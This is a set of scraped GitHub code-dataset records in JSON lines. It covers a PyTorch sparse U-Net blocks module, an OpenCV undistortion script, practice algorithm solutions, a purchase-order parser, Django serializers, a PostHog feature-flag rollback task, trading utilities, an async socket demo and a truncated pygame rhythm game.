It will be removed after the bug is fixed\nclass Custom1x1Subm3d(spconv.SparseConv3d):\n def forward(self, input):\n features = torch.mm(input.features, self.weight.view(self.out_channels, self.in_channels).T)\n if self.bias is not None:\n features += self.bias\n out_tensor = spconv.SparseConvTensor(features, input.indices, input.spatial_shape, input.batch_size)\n out_tensor.indice_dict = input.indice_dict\n out_tensor.grid = input.grid\n return out_tensor\n\n\nclass ResidualBlock(SparseModule):\n def __init__(self, in_channels, out_channels, norm_fn, indice_key=None):\n super().__init__()\n\n if in_channels == out_channels:\n self.i_branch = spconv.SparseSequential(nn.Identity())\n else:\n self.i_branch = spconv.SparseSequential(\n Custom1x1Subm3d(in_channels, out_channels, kernel_size=1, bias=False)\n )\n\n self.conv_branch = spconv.SparseSequential(\n norm_fn(in_channels),\n nn.ReLU(),\n spconv.SubMConv3d(in_channels, out_channels, kernel_size=3, padding=1, bias=False, indice_key=indice_key),\n norm_fn(out_channels),\n nn.ReLU(),\n spconv.SubMConv3d(out_channels, out_channels, kernel_size=3, padding=1, bias=False, indice_key=indice_key),\n )\n\n def forward(self, input):\n identity = spconv.SparseConvTensor(input.features, input.indices, input.spatial_shape, input.batch_size)\n output = self.conv_branch(input)\n out_feats = output.features + self.i_branch(identity).features\n output = output.replace_feature(out_feats)\n\n return output\n\n\nclass UBlock(nn.Module):\n def __init__(self, nPlanes, norm_fn, block_reps, block, indice_key_id=1):\n\n super().__init__()\n\n self.nPlanes = nPlanes\n\n blocks = {\n \"block{}\".format(i): block(nPlanes[0], nPlanes[0], norm_fn, indice_key=\"subm{}\".format(indice_key_id))\n for i in range(block_reps)\n }\n blocks = OrderedDict(blocks)\n self.blocks = spconv.SparseSequential(blocks)\n\n if len(nPlanes) > 1:\n self.conv = spconv.SparseSequential(\n norm_fn(nPlanes[0]),\n nn.ReLU(),\n spconv.SparseConv3d(\n nPlanes[0],\n nPlanes[1],\n kernel_size=2,\n stride=2,\n bias=False,\n indice_key=\"spconv{}\".format(indice_key_id),\n ),\n )\n\n self.u = UBlock(nPlanes[1:], norm_fn, block_reps, block, indice_key_id=indice_key_id + 1)\n\n self.deconv = spconv.SparseSequential(\n norm_fn(nPlanes[1]),\n nn.ReLU(),\n spconv.SparseInverseConv3d(\n nPlanes[1], nPlanes[0], kernel_size=2, bias=False, indice_key=\"spconv{}\".format(indice_key_id)\n ),\n )\n\n blocks_tail = {}\n for i in range(block_reps):\n blocks_tail[\"block{}\".format(i)] = block(\n nPlanes[0] * (2 - i), nPlanes[0], norm_fn, indice_key=\"subm{}\".format(indice_key_id)\n )\n blocks_tail = OrderedDict(blocks_tail)\n self.blocks_tail = spconv.SparseSequential(blocks_tail)\n\n def forward(self, input):\n\n output = self.blocks(input)\n identity = spconv.SparseConvTensor(output.features, output.indices, output.spatial_shape, output.batch_size)\n if len(self.nPlanes) > 1:\n output_decoder = self.conv(output)\n output_decoder = self.u(output_decoder)\n output_decoder = self.deconv(output_decoder)\n out_feats = torch.cat((identity.features, output_decoder.features), dim=1)\n output = output.replace_feature(out_feats)\n output = self.blocks_tail(output)\n return output\n\n\nclass PositionalEmbedding(nn.Module):\n def __init__(self, in_channels, N_freqs, logscale=True):\n \"\"\"\n Defines a function that embeds x to (x, sin(2^k x), cos(2^k x), ...)\n in_channels: number of input channels (3 for both xyz and direction)\n \"\"\"\n super(PositionalEmbedding, self).__init__()\n self.N_freqs = N_freqs\n 
self.in_channels = in_channels\n self.funcs = [torch.sin, torch.cos]\n self.out_channels = in_channels * (len(self.funcs) * N_freqs + 1)\n\n if logscale:\n self.freq_bands = 2 ** torch.linspace(0, N_freqs - 1, N_freqs)\n else:\n self.freq_bands = torch.linspace(1, 2 ** (N_freqs - 1), N_freqs)\n\n def forward(self, x):\n \"\"\"\n Embeds x to (x, sin(2^k x), cos(2^k x), ...)\n Different from the paper, \"x\" is also in the output\n See https://github.com/bmild/nerf/issues/12\n Inputs:\n x: (B, self.in_channels)\n Outputs:\n out: (B, self.out_channels)\n \"\"\"\n out = [x]\n for freq in self.freq_bands:\n for func in self.funcs:\n out += [func(freq * x)]\n\n return torch.cat(out, -1)\n\n\nclass Conv1d(torch.nn.Conv1d):\n def __init__(self, *args, **kwargs):\n \"\"\"\n Extra keyword arguments supported in addition to those in `torch.nn.Conv2d`:\n Args:\n norm (nn.Module, optional): a normalization layer\n activation (callable(Tensor) -> Tensor): a callable activation function\n It assumes that norm layer is used before activation.\n \"\"\"\n norm = kwargs.pop(\"norm\", None)\n activation = kwargs.pop(\"activation\", None)\n super().__init__(*args, **kwargs)\n\n self.norm = norm\n self.activation = activation\n\n def forward(self, x):\n if x.numel() == 0 and self.training:\n # https://github.com/pytorch/pytorch/issues/12013\n assert not isinstance(self.norm, torch.nn.SyncBatchNorm), \"SyncBatchNorm does not support empty inputs!\"\n\n x = super().forward(x)\n if self.norm is not None:\n x = self.norm(x)\n if self.activation is not None:\n x = self.activation(x)\n return x\n\n\ndef conv_with_kaiming_uniform(norm=None, activation=None, use_sep=False):\n def make_conv(in_channels, out_channels):\n conv_func = Conv1d\n if use_sep:\n assert in_channels == out_channels\n groups = in_channels\n else:\n groups = 1\n\n conv = conv_func(\n in_channels, out_channels, kernel_size=1, stride=1, padding=0, groups=groups, bias=(norm is None)\n )\n\n nn.init.kaiming_uniform_(conv.weight, a=1)\n if norm is None:\n nn.init.constant_(conv.bias, 0)\n\n module = [\n conv,\n ]\n if norm is not None and len(norm) > 0:\n norm_module = torch.nn.BatchNorm1d(out_channels)\n module.append(norm_module)\n if activation is not None:\n module.append(nn.ReLU(inplace=True))\n if len(module) > 1:\n return nn.Sequential(*module)\n return conv\n\n return make_conv\n","repo_name":"VinAIResearch/ISBNet","sub_path":"isbnet/model/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":11569,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"53"} +{"seq_id":"34436420945","text":"# este programa corrige la distorsión de las imágenes\n# dados los parámetros intrínsecos de la cámara utilizada\n\nimport numpy as np\nimport cv2 as cv\nimport glob\n\n# cargamos los parámetros intrínsecos\nK = np.load('data/intrinsic_matrix.npy')\ndist = np.load('data/distortion_coeffs.npy')\n\n# array con los paths de las imágenes que se van a utilizar\nimages = glob.glob('imagenes/*.png')\n\nnumero_imagen = 0\nfor fname in images:\n numero_imagen += 1\n img = cv.imread(fname)\n h, w = img.shape[:2]\n newK, roi = cv.getOptimalNewCameraMatrix(K, dist, (w,h), 1, (w,h))\n\n # corrige la imagen\n dst = cv.undistort(img, K, dist, None, newK)\n\n # crop the image\n # x, y, w, h = roi\n # dst = dst[y:y+h, x:x+w]\n\n # guardamos las imágenes con la distorsión corregida\n cv.imwrite('imagenes_corregidas/undist'+str(numero_imagen)+'.png', 
dst)\n\n","repo_name":"luciadelacaridad/TFGProject_ComputationalPhotography","sub_path":"undistortion.py","file_name":"undistortion.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75335455528","text":"\ndef solution1(n,moves):\n x = 1\n y = 1\n\n for i in moves:\n if i is 'R':\n if y != n: y += 1\n elif i is 'U':\n if x != 1: x += 1\n elif i is 'D':\n if x != n: x += 1\n elif i is 'L':\n if y != 1: y += 1\n\n print(x,y)\n\ndef solution2(n):\n result = 0\n for i in range(n+1):\n for j in range(60):\n for k in range(60):\n if '3' in str(i)+str(j)+str(k):\n result+=1\n return result\n\ndef solution3(position):\n row = int(position[1])\n col = int(ord(position[0])) - int(ord('a')) +1\n result = 0\n steps =[(-2,-1),(-1,-2),(-2,1),(-1,2),(2,-1),(1,-2),(2,1),(1,2)]\n\n for step in steps:\n next_row = row + step[0]\n next_col = col + step[1]\n if next_row >= 1 and next_row <= 8 and next_col >=1 and next_col <= 8 :\n result += 1\n return result\n\nsolution1(5,['R','R','R','U','D','D'])\nprint(\"****\")\nprint(solution2(5))\nprint(\"****\")\nprint(solution3(\"a1\"))\nprint(solution3(\"c3\"))","repo_name":"jeongy616/Algorithm-Study","sub_path":"books/It's Coding Test/implementation.py","file_name":"implementation.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74336260006","text":"import re\nfrom datetime import datetime\nfrom po_formats.po_base import PO_BASE\n\nclass PO_TYPE_8(PO_BASE):\n def __init__(self, poDocFilepath: str) -> None:\n super().__init__(poDocFilepath)\n\n def __buyer(self)->str:\n \"\"\"\n Returns the buyer name \n \"\"\"\n return 'RENFOLD LTD'\n\n def __company(self)->str:\n \"\"\"\n Returns the company name\n \"\"\"\n return 'CENTRO INTERNATIONAL SOURCING LIMITED'\n\n def __poNumber(self)->int:\n \"\"\"\n Returns the purchase order number\n \"\"\"\n return int(re.findall(r\"PURCHASE\\s+ORDER\\s+NUMBER\\s?\\n\\s?PO\\-(\\d+)\\s?\\n\",self.getPage(1).upper())[0])\n\n def __poDate(self)->str:\n \"\"\"\n Returns the purchase order date\n \"\"\"\n (_d,_m,_y) = re.findall(r\"PURCHASE\\s+ORDER\\s+DATE\\s?\\n\\s?(\\d{1,2})[\\s\\.,\\-/]{1,3}([A-Z]*\\d{0,2})[\\s\\.,\\-/]{1,3}(\\d{2,4})\\s?\\n\",self.getPage(1).upper())[0]\n\n try:\n return datetime.strptime(f\"{_d}.{_m[0:3]}.{_y[-2:]}\",\"%d.%b.%y\").strftime(\"%d-%b-%y\")\n except ValueError:\n return datetime.strptime(f\"{_d}.{_m}.{_y[-2:]}\",\"%d.%m.%y\").strftime(\"%d-%b-%y\")\n\n def __currency(self)->str:\n \"\"\"\n Returns the currency type\n \"\"\"\n return \"$\"\n\n def __shipDate(self)->str:\n \"\"\"\n Returns the ship date\n \"\"\"\n (_d,_m,_y) = re.findall(r\"DELIVERY\\s+DATE\\s?\\n\\s?(\\d{1,2})[\\s\\.,\\-/]{1,3}([A-Z]*\\d{0,2})[\\s\\.,\\-/]{1,3}(\\d{2,4})\\s?\\n\",self.getPage(1).upper())[0]\n\n try:\n return datetime.strptime(f\"{_d}.{_m[0:3]}.{_y[-2:]}\",\"%d.%b.%y\").strftime(\"%d-%b-%y\")\n except ValueError:\n return datetime.strptime(f\"{_d}.{_m}.{_y[-2:]}\",\"%d.%m.%y\").strftime(\"%d-%b-%y\")\n\n def __shipmentMode(self)->str:\n \"\"\"\n Returns the shipment mode\n \"\"\"\n return \"SEA\"\n\n def __getRecords(self)->list[tuple]:\n _all_content = \"\".join([self.getPage(pageNumber) for pageNumber in range(1,self.numPages()+1)])\n return re.findall(r\"([0-9A-Z]+)\\s+\\-\\s+([A-Z\\-\\s]+\\n?[A-Z\\-\\s]*)\\n?([\\d\\.]+)\\s+([\\d\\.]+)\\s+([\\d,]+)\",_all_content.upper())\n\n def 
__style(self,record_index:int)->str:\n \"\"\"\n Returns the style\n \"\"\"\n _records = self.__getRecords()\n if record_index>=0 and record_indexstr:\n \"\"\"\n Returns the style description\n \"\"\"\n _records = self.__getRecords()\n if record_index>=0 and record_indexint:\n \"\"\"\n Returns the total quantity\n \"\"\"\n _records = self.__getRecords()\n if recordIndex>=0 and recordIndexdict:\n \"\"\"\n Returns the purchase orders details\n \"\"\"\n dest = \"UNITED KINGDOM\"\n poDict = {}\n records = self.__getRecords()\n if recordIndex>=0 and recordIndexlist:\n \"\"\"\n Returns a list of purchase order data details\n \"\"\"\n def getPoDetailsDict(recordIndex:int)->dict:\n poDetails = {\n \"team\":\"\",\n \"src_merc\":\"\",\n \"company\":self.__company(),\n \"consignee\":self.__buyer(),\n \"buyer\":self.__buyer(),\n \"category\":\"\",\n \"dept\":\"\",\n \"season_year\":\"\",\n \"season\":\"\",\n \"style\":self.__style(recordIndex),\n \"style_desc\":self.__styleDescription(recordIndex),\n \"gmt_item\":\"\",\n \"uom\":\"\",\n \"ratio\":\"\",\n \"total_qty\":self.__totalQuantity(recordIndex),\n \"currency\":self.__currency(),\n \"factory\":\"\",\n \"fabric_src\":\"\",\n \"fabric\": '',\n \"fabric_mill\":\"\",\n \"sust_fabric\":\"\",\n \"po_num\":self.__poNumber(),\n \"po_date\":self.__poDate(),\n \"po_status\":\"\",\n \"shipment_mode\":self.__shipmentMode(),\n \"purchase_orders\":self.__purchaseOrders(recordIndex)\n }\n return poDetails\n\n poDetailsList = []\n records = self.__getRecords()\n for recordIndex in range(0,len(records)):\n poDetailsList.append(getPoDetailsDict(recordIndex))\n\n return poDetailsList\n\n def output(self)->tuple:\n \"\"\"\n Returns the extracted data\n \"\"\"\n return (self.__poDetails())","repo_name":"dimuthukag/po-extractor","sub_path":"po_formats/po_type_8.py","file_name":"po_type_8.py","file_ext":"py","file_size_in_byte":5632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74739467369","text":"from rest_framework import serializers\nfrom rest_framework.validators import UniqueTogetherValidator\nfrom coursetomajor.models import CourseToMajor\n\n\nclass CourseToMajorSerializer(serializers.ModelSerializer):\n class Meta:\n model = CourseToMajor\n fields = '__all__'\n depth = 3\n\n @staticmethod\n def setup_eager_loading(queryset):\n queryset = queryset.select_related(\n 'course',\n 'course__level',\n 'course__dept',\n 'course__dept__college',\n 'level',\n 'major',\n 'major__dept',\n 'major__dept__college',)\n return queryset\n\n\nclass CourseToMajorCreateSerializer(serializers.ModelSerializer):\n class Meta:\n validators = [\n UniqueTogetherValidator(\n queryset=CourseToMajor.objects.all(),\n fields=('course', 'major')\n )\n ]\n model = CourseToMajor\n fields = '__all__'\n","repo_name":"GHostEater/Portal","sub_path":"coursetomajor/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16758077239","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nmass = []\ndiam = []\ntime = []\npoly = []\n\nf = open(\"stats_sand_v2.6TjqaM23742475.txt\")\nfor ligne in f.readlines():\n data = ligne.split(\" \")\n mass += [int(data[0].split(\"=\")[1])]\n # time += [int(data[1].split(\"=\")[1])]\n diam += [int(data[2].split(\"=\")[1])*2*10**7]\nf.close()\n\np = np.poly1d(np.polyfit(mass,[p*p for p in diam],1))\n# plt.plot(mass,[p(x) for x in mass],label = 'linear 
approach')\n\nplt.plot(mass,[np.sqrt(p(mass[x]))-diam[x] for x in range(0,len(diam))],label='diffenrential')\nplt.ylabel('difference')\nplt.xlabel('mass')\nplt.legend()\nplt.show()\n\nprint(np.polyfit(mass,np.log(diam),1))\n","repo_name":"etouss/Tas-de-sable","sub_path":"stats/scr2_local.py","file_name":"scr2_local.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39605613827","text":"\"\"\"\nСоздайте класс-функцию, который считает факториал числа при\nвызове экземпляра.\nЭкземпляр должен запоминать последние k значений.\nПараметр k передаётся при создании экземпляра.\nДобавьте метод для просмотра ранее вызываемых значений и\nих факториалов.\n\n\"\"\"\n\n\nclass FactorialOf:\n    _values = {}\n\n    def __init__(self, base: int):\n        self._base = base\n        self._calc()\n\n    def _calc(self):\n        self.out = 1\n        for i in range(1, self._base + 1):\n            if i not in FactorialOf._values:\n                print(\"calc of\", i)\n                self.out = self.out * i\n                FactorialOf._values[i] = self.out\n            else:\n                self.out = FactorialOf._values[i]\n\n    def __call__(self):\n        return self.out\n\n    def get_vals(self):\n        return FactorialOf._values\n\n\nif __name__ == '__main__':\n    a = FactorialOf(100)\n    print(a())\n    b = FactorialOf(99)\n    print(b())\n    print(b.get_vals())\n","repo_name":"am1bestofluck/python_insight","sub_path":"sem12/t_1.py","file_name":"t_1.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39501018489","text":"from datetime import datetime, timedelta\nfrom typing import Dict\nfrom zoneinfo import ZoneInfo\n\nfrom celery import shared_task\n\nfrom ee.api.sentry_stats import get_stats_for_timerange\nfrom posthog.models.feature_flag import FeatureFlag\nfrom posthog.models.filters.filter import Filter\nfrom posthog.models.team import Team\nfrom posthog.queries.trends.trends import Trends\n\n\ndef check_flags_to_rollback():\n    flags_with_threshold = FeatureFlag.objects.exclude(rollback_conditions__isnull=True).exclude(\n        rollback_conditions__exact=[]\n    )\n\n    for feature_flag in flags_with_threshold:\n        check_feature_flag_rollback_conditions(feature_flag_id=feature_flag.pk)\n\n\n@shared_task(ignore_result=True, max_retries=2)\ndef check_feature_flag_rollback_conditions(feature_flag_id: int) -> None:\n    flag: FeatureFlag = FeatureFlag.objects.get(pk=feature_flag_id)\n\n    if any(check_condition(condition, flag) for condition in flag.rollback_conditions):\n        flag.performed_rollback = True\n        flag.active = False\n        flag.save()\n\n\ndef calculate_rolling_average(threshold_metric: Dict, team: Team, timezone: str) -> float:\n    curr = datetime.now(tz=ZoneInfo(timezone))\n\n    rolling_average_days = 7\n\n    filter = Filter(\n        data={\n            **threshold_metric,\n            \"date_from\": (curr - timedelta(days=rolling_average_days)).strftime(\"%Y-%m-%d %H:%M:%S.%f\"),\n            \"date_to\": curr.strftime(\"%Y-%m-%d %H:%M:%S.%f\"),\n        },\n        team=team,\n    )\n    trends_query = Trends()\n    result = trends_query.run(filter, team)\n\n    if not len(result):\n        return False\n\n    data = result[0][\"data\"]\n\n    return sum(data) / rolling_average_days\n\n\ndef check_condition(rollback_condition: Dict, feature_flag: FeatureFlag) -> bool:\n    if rollback_condition[\"threshold_type\"] == \"sentry\":\n        created_date = feature_flag.created_at\n        base_start_date = created_date.strftime(\"%Y-%m-%dT%H:%M:%S\")\n        base_end_date = (created_date + timedelta(days=1)).strftime(\"%Y-%m-%dT%H:%M:%S\")\n\n        current_time = datetime.utcnow()\n        target_end_date = current_time.strftime(\"%Y-%m-%dT%H:%M:%S\")\n        target_start_date = (current_time - timedelta(days=1)).strftime(\"%Y-%m-%dT%H:%M:%S\")\n\n        base, target = get_stats_for_timerange(base_start_date, base_end_date, target_start_date, target_end_date)\n\n        if rollback_condition[\"operator\"] == \"lt\":\n            return target < float(rollback_condition[\"threshold\"]) * base\n        else:\n            return target > float(rollback_condition[\"threshold\"]) * base\n\n    elif rollback_condition[\"threshold_type\"] == \"insight\":\n        rolling_average = calculate_rolling_average(\n            rollback_condition[\"threshold_metric\"],\n            feature_flag.team,\n            feature_flag.team.timezone,\n        )\n\n        if rollback_condition[\"operator\"] == \"lt\":\n            return rolling_average < rollback_condition[\"threshold\"]\n        else:\n            return rolling_average > rollback_condition[\"threshold\"]\n\n    return False\n","repo_name":"PostHog/posthog","sub_path":"ee/tasks/auto_rollback_feature_flag.py","file_name":"auto_rollback_feature_flag.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"20524585608","text":"import math\nimport uuid\nimport time\nimport logging\nimport calendar\nfrom datetime import datetime\n\nfrom config.Config import getHolidays\n\nclass Utils:\n    dateFormat = \"%Y-%m-%d\"\n    timeFormat = \"%H:%M:%S\"\n    dateTimeFormat = \"%Y-%m-%d %H:%M:%S\"\n\n    @staticmethod\n    def initLoggingConfig():\n        format = \"%(asctime)s: %(message)s\"\n        logging.basicConfig(format=format, level=logging.INFO, datefmt=\"%Y-%m-%d %H:%M:%S\")\n\n    @staticmethod\n    def roundOff(price): # Round off to 2 decimal places\n        return round(price, 2)\n    \n    @staticmethod\n    def roundToNSEPrice(price):\n        x = round(price, 2) * 20\n        y = math.ceil(x)\n        return y / 20\n\n    @staticmethod\n    def isMarketOpen():\n        if Utils.isTodayHoliday():\n            return False\n        now = datetime.now()\n        marketStartTime = Utils.getMarketStartTime()\n        marketEndTime = Utils.getMarketEndTime()\n        return now >= marketStartTime and now <= marketEndTime\n\n    @staticmethod\n    def isMarketClosedForTheDay():\n        # This method returns true if the current time is > marketEndTime\n        # Please note this will not return true if current time is < marketStartTime on a trading day\n        if Utils.isTodayHoliday():\n            return True\n        now = datetime.now()\n        marketEndTime = Utils.getMarketEndTime()\n        return now > marketEndTime\n\n    @staticmethod\n    def waitTillMarketOpens(context):\n        nowEpoch = Utils.getEpoch(datetime.now())\n        marketStartTimeEpoch = Utils.getEpoch(Utils.getMarketStartTime())\n        waitSeconds = marketStartTimeEpoch - nowEpoch\n        if waitSeconds > 0:\n            logging.info(\"%s: Waiting for %d seconds till market opens...\", context, waitSeconds)\n            time.sleep(waitSeconds)\n\n    @staticmethod\n    def getEpoch(datetimeObj):\n        # This method converts given datetimeObj to epoch seconds\n        epochSeconds = datetime.timestamp(datetimeObj)\n        return int(epochSeconds) # converting double to long\n\n    @staticmethod\n    def getMarketStartTime():\n        return Utils.getTimeOfToDay(9, 15, 0)\n\n    @staticmethod\n    def getMarketEndTime():\n        return Utils.getTimeOfToDay(15, 30, 0)\n\n    @staticmethod\n    def getTimeOfToDay(hours, minutes, seconds):\n        datetimeObj = datetime.now()\n        datetimeObj = datetimeObj.replace(hour=hours, minute=minutes, second=seconds, microsecond=0)\n        return datetimeObj\n\n    @staticmethod\n    def getTodayDateStr():\n        now = datetime.now()\n        return now.strftime(Utils.dateFormat)\n\n    @staticmethod\n    def isTodayHoliday():\n        now = datetime.now()\n        
dayOfWeek = calendar.day_name[now.weekday()]\n if dayOfWeek == 'Saturday' or dayOfWeek == 'Sunday':\n return True\n\n todayDate = Utils.getTodayDateStr()\n holidays = getHolidays()\n if (todayDate in holidays):\n return True\n else:\n return False\n\n @staticmethod\n def generateTradeID():\n return str(uuid.uuid4())\n\n","repo_name":"SGChebrolu/sdoosa-algo-trade-python","sub_path":"src/utils/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"20524585608","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n# callbacks based async framework\n# * non blocking sockets 2°\n# * callbacks, allowing multiples operations to be waiting concurrently for i/o operations 3°\n# * event loop 3°\n# * coroutines 4°\n# --> Future\n# --> generators\n# --> Task, responsible for calling next() on the generators\n\n\nimport socket\nimport time\n\n# 2° to wait for some event on a non blocking socket\n# jusk ask for the default selector for your system\nfrom selectors import DefaultSelector, EVENT_WRITE, EVENT_READ\nselector = DefaultSelector()\nn_tasks = 0\n\n\n# a Future represent some pending event we're waiting for\nclass Future:\n def __init__(self):\n self.callbacks = [] # what to do when event occurs\n\n def resolve(self):\n for c in self.callbacks:\n c()\n\nclass Task:\n def __init__(self, gen):\n self.gen = gen\n self.step() # to first execute the part before the yield instruction\n\n def step(self):\n try:\n # generator will yield a future, let's capture that\n f = next(self.gen)\n except StopIteration:\n return\n\n # once the future is ready,\n # prepare another call to next(self.gen) again,\n # that will execute the part after the yield instruction\n f.callbacks.append(self.step)\n\n\n# client socket to retrieve something from a server\ndef get(path):\n global n_tasks\n n_tasks += 1\n\n s = socket.socket()\n s.setblocking(False) # socket no more blocking\n try:\n s.connect(('duckduckgo.com', 80)) # will return immediately or raise exception\n except BlockingIOError:\n pass\n\n request = 'GET %s HTTP/1.0\\r\\n\\r\\n' % path\n\n f = Future()\n # dear selector, I'm interested in any event that may occur on this file descriptor (my socket)\n selector.register(s.fileno(), EVENT_WRITE, data=f)\n # how to pause until s is writable?\n yield f\n\n # I'm no more interested in the write event on my socket, please forget about it\n selector.unregister(s.fileno())\n # socket is writable, so we can send\n s.send(request.encode()) # un-code\n\n chunks = []\n\n while True:\n f = Future()\n # dear selector, I'm interested in any read event that may occur on this file descriptor\n selector.register(s.fileno(), EVENT_READ, data=f)\n # how to pause until s is readable\n yield f\n # I'm no more interested in the read event on my socket, please forget about it\n selector.unregister(s.fileno())\n\n chunk = s.recv(1000)\n if chunk:\n chunks.append(chunk)\n else: #empty chunk, server hang up\n body = b''.join(chunks).decode() # be-code\n print(body.split('\\n')[0])\n n_tasks -= 1\n return\n\nstart = time.time()\n\n# we need now to create our tasks\n# a task get a generator\n# then call next to execute the first part, before 
yied\nTask(get('/?q=python+socket+&t=lm&ia=about'))\nTask(get('/?q=golang+socket+&t=lm&ia=about'))\nTask(get('/?q=rust+socket+&t=lm&ia=about'))\nTask(get('/?q=erlang+socket+&t=lm&ia=about'))\nTask(get('/?q=python+socket+&t=lm&ia=about'))\nTask(get('/?q=golang+socket+&t=lm&ia=about'))\nTask(get('/?q=rust+socket+&t=lm&ia=about'))\nTask(get('/?q=erlang+socket+&t=lm&ia=about'))\nTask(get('/?q=python+socket+&t=lm&ia=about'))\nTask(get('/?q=golang+socket+&t=lm&ia=about'))\nTask(get('/?q=rust+socket+&t=lm&ia=about'))\nTask(get('/?q=erlang+socket+&t=lm&ia=about'))\nTask(get('/?q=python+socket+&t=lm&ia=about'))\nTask(get('/?q=golang+socket+&t=lm&ia=about'))\nTask(get('/?q=rust+socket+&t=lm&ia=about'))\nTask(get('/?q=erlang+socket+&t=lm&ia=about'))\n\n\nwhile n_tasks:\n # retrieve events\n events = selector.select()\n for event, mask in events:\n future = event.data # retrieve the future\n # call the callbacks associated to the future\n future.resolve()\n\n# get launched serially, so final time is time for one request times number of requests\nprint(\"took %.1f sec\" % (time.time() - start))\n","repo_name":"PlumpMath/how-coroutines-works","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13630629396","text":"import pygame, random, time, os\nimport sys\n\npygame.init()\n\nwidth = 640\nheight = 480\ntitle_width = 300\ntitle_height = 100\nstart_button_width = 100\nstart_button_height = 50\nexit_button_width = 100\nexit_button_height = 50\n\nscreen = pygame.display.set_mode((width, height))\nsurface = pygame.Surface((100,100))\n\n\npygame.display.set_caption(\"Rhythm Game\")\n\ntitle = pygame.image.load(\"title.jpg\")\nstart_button = pygame.image.load(\"start.jpg\")\nexit_button = pygame.image.load(\"exit.jpg\")\nbackground = pygame.image.load(\"BackGround.jpg\")\n\ntitle = pygame.transform.scale(title, (title_width, title_height))\nstart_button = pygame.transform.scale(start_button, (start_button_width, start_button_height))\nexit_button = pygame.transform.scale(exit_button, (exit_button_width, exit_button_height))\n\nrunning = True\ngame_state = \"start\"\n\nwhile running:\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n running = False\n\n if event.type == pygame.MOUSEBUTTONDOWN and game_state == \"start\":\n mouse_x, mouse_y = event.pos\n\n start_button_rect = start_button.get_rect()\n start_button_rect.topleft = (start_button_x, start_button_y)\n\n if start_button_rect.collidepoint(mouse_x, mouse_y):\n game_state = \"play\"\n\n exit_button_rect = exit_button.get_rect()\n exit_button_rect.topleft = (exit_button_x, exit_button_y)\n\n if exit_button_rect.collidepoint(mouse_x, mouse_y):\n running = False\n\n screen.blit(background, (0, 0))#배경 화면 그리기\n screen.blit(title, (200, 100))#제목 그리기\n\n if game_state == \"start\":\n\n #버튼의 위치\n start_button_x = width // 2 - 200\n start_button_y = 300\n exit_button_x = width // 2 + 120\n exit_button_y = 300\n\n #버튼 생성\n screen.blit(start_button, (start_button_x, start_button_y))\n screen.blit(exit_button, (exit_button_x, exit_button_y))\n\n #다음 화면 구현\n elif game_state == \"play\":\n \n surface.fill((0,0,0))\n \n w = 640\n h = 480\n\n clock = pygame.time.Clock()\n keys = [0,0,0,0]\n keyset = [0,0,0,0]\n maxframe = 60\n fps = 0\n gst = time.time()\n speed = 2\n notesumt = 0\n\n a = 0\n aa = 0\n\n t1 = []\n t2 = []\n t3 = []\n t4 = []\n\n def sum_note(n):\n if n == 1:\n ty = 0 #노트 y축\n tst = Time #노트 소환 
시간\n if n == 1:\n t1.append([ty,tst])\n if n == 2:\n t2.append([ty,tst])\n if n == 3:\n t3.append([ty,tst])\n if n == 4:\n t4.append([ty,tst])\n\n\n while True:\n \n \n \n Time = time.time() - gst\n\n if Time > 0.2 * notesumt:\n notesumt += 1\n while a == aa:\n a = random.randint(1, 4)\n sum_note(a) \n aa = a\n #노트 랜덤하게 떨어지게 만드는 함수\n\n fps = clock.get_fps()\n\n if fps == 0:\n fps = maxframe\n\n for event in pygame.event.get(): #키 눌렀을때 노트 떨어짐(노트 삭제 포함)\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_e:\n keyset[0] = 1\n if len(t1) > 0:\n if t1[0][0] > h / 2:\n del t1[0]\n if event.key == pygame.K_f:\n keyset[1] = 1\n if len(t1) > 0:\n if t2[0][0] > h / 2:\n del t2[0]\n if event.key == pygame.K_j:\n keyset[2] = 1\n if len(t1) > 0:\n if t3[0][0] > h / 2:\n del t3[0]\n if event.key == pygame.K_i:\n keyset[3] = 1\n if len(t1) > 0:\n if t4[0][0] > h / 2:\n del t4[0]\n \n if event.type == pygame.KEYUP:\n if event.key == pygame.K_e:\n keyset[0] = 0\n if event.key == pygame.K_f:\n keyset[1] = 0\n if event.key == pygame.K_j:\n keyset[2] = 0\n if event.key == pygame.K_i:\n keyset[3] = 0\n\n for tile_data in t1:\n tile_data[0] = (h/12) * 9 + (Time - tile_data[1]) * 350 * speed * (h/900)\n pygame.draw.rect(screen, (255,255,255),(w / 2 - w / 8, tile_data[0] - h / 100, w / 16 , h / 50))\n if tile_data[0] > h - (h / 9):\n t1.remove(tile_data)\n for tile_data in t2:\n tile_data[0] = (h/12) * 9 + (Time - tile_data[1]) * 350 * speed * (h/900)\n pygame.draw.rect(screen, (255,255,255),(w / 2 - w / 16, tile_data[0] - h / 100, w / 16 , h / 50))\n if tile_data[0] > h - (h / 9):\n t2.remove(tile_data)\n for tile_data in 